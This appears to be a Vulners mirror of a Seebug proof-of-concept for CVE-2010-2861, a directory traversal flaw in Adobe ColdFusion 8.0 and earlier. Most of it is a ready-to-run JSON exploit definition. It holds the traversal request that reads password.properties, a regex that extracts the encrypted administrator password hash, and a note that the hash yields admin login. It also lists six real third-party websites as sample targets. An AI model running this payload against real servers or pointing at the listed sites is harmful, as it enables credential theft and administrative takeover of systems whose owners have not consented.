Lucene search
K

Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)

🗓️ 01 Jul 2014 00:00:00Reported by black_miaType 
seebug
 seebug
🔗 www.seebug.org👁 203 Views

Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861) allows unauthorized access to sensitive system files

Related
Code

                                                {
    "pocInfo": {
        "vulID": "71470",
        "version": "1",
        "name": "Adobe ColdFusion - 跨目录及管理员凭证泄露漏洞",
        "protocol": "http",
        "author": "Jeremie",
        "references": ["http://www.sebug.net/vuldb/ssvid-71470"],
        "appName": "ColdFusion",
        "appVersion" : "8.0",
        "createDate": "1442624949",
        "updateDate": "1442624949",
        "appPowerLink": "http://www.adobe.com/products/coldfusion-family.html",
        "vulDate": "1281715200",
        "vulType": "Information Disclosure",
        "desc" :"Adobe ColdFusion存在一个跨目录及管理员凭证泄露漏洞,导致可获取管理员加密的凭证值,经过转换即可以以管理员身份登录后台。",
        "samples": ["http://powercampus.cuea.edu", "http://cosdashboard.xd.ndorange.com","http://www.smc.edu.au","http://www.pbrmexico.com","http://www.buythiscar.co.nz","http://www.zoo.ch"]
    },

    "pocExecute":{
        "verify": [
            {
                "step": "0",
                "method": "get",
                "vulPath": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
                "params": "",
                "necessary": "",
                "headers": {},
                "status": "200",
                "match": {
                    "regex": ["encrypted=true"]
                }
            }
        ],
        "attack": [
            {
                "step": "0",
                "method": "get",
                "vulPath": "/CFIDE/administrator/enter.cfm",
                "params": "locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
                "necessary": "",
                "headers": {},
                "status": "200",
                "match": {
                    "regex": ["encrypted=true"],
                    "time":""
                },
                "result": {
                    "DBInfo": {
                        "Encrypted password": "<regex>[0-9A-F]{40}"
                    }
                }
            }
        ]
    }
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation